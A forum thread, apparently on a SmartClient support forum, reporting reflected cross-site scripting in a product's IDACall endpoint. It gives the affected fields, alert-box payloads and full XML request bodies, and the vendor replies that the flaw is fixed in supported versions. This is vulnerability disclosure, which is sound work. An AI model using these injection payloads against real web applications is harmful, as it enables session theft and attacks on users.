Announcement

Collapse
No announcement yet.
X
  • Filter
  • Time
Clear All
new posts

    Reflected Cross Site Scripting

    Potential impact:

    Perform client-side attacks to the users of the web application. An attacker could inject malicious JavaScript code to steal user credentials, steal sensitive data, perform crypto mining activities and implement a key logger or a XSS worm.



    Description:

    Stored XSS (also known as persistent) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

    We have detected several user inputs not sanitized properly, hence it makes possible for a potential attacker to execute JavaScript code in user’s browser.



    Reflected Cross Site Scripting 1:

    These are the details of the injection point:

    URL: https://<host>:6443/bimft/isomorphic/IDACall

    Field: methodName

    Payload: '&lt;/TEXTAREA &gt; &lt;img src=x onerror=alert('boehringer')&gt;&lt;TEXTAREA&gt;



    <transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchemainstance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><o

    perations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID>isc_builtin</appID><cla

    ssName>builtin</className><methodName>'&lt;/TEXTAREA

    &gt;&lt;img src=x onerror=alert('RedTeam')&gt;&lt;TEXTAREA&gt;</methodName><is_ISC_RPC_D

    MI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI></elem></operations></transaction>



    Reflected Cross Site Scripting 2:

    These are the details of the injection point:

    URL: https://<HOST>:6443/bimft/isomorphic/IDACall

    Field: appID

    Payload: &lt;/TEXTAREA &gt; &lt;img src=x onerror=alert('RedTeam')&gt;&lt;TEXTAREA&gt;

    <transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchemainstance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><o

    perations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID> &lt;/TEXTAREA

    &gt;&lt;img src=x onerror=alert('RedTeam')&gt;&lt;TEXTAREA&gt;</appID><className>builtin

    </className><methodName>loadFile</methodName><is_ISC_RPC_DMI xsi:type="xsd:boolean">true

    </is_ISC_RPC_DMI></elem></operations></transaction>



    Reflected Cross Site Scripting 3:

    These are the details of the injection point:

    URL: https://<HOST>:6443/bimft/isomorphic/IDACall

    Field: isc_dd

    Payload: ';</script><img+src=""+onerror=alert("RedTeam")><script>var+a='



    In all the cases, an Alert pop-up is triggered by exploiting the vulnerability:

    Triggering Alert pop-up

    See the attachment for the popup trigerred.
    Attached Files

    #2
    Looong since fixed, please do not security test unpatched software!

    Comment


      #3
      Can you let us know which version of smartclient this issue is fixed. We are planning to upgrade to v12.1

      Comment


        #4
        All versions that aren't end-of-lifed, which of course includes 12.1.

        Comment

        Working...
        X